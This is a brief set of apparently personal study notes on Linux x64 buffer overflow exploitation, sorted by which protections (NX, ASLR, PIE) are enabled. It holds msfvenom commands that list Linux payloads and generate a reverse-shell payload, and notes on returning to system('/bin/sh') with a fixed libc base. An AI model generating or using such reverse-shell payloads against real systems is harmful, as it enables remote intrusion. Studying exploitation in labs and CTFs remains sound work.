buf overflow

no nx

msfvenom -l payloads|grep linux
msfvenom -p linux/x64/shell_reverse_tcp -f python

nx no aslr

ldd glibc.so -> fixed base addr

nx aslr pie x64:system('/bin/sh')

nx aslr pie x64:reverse shell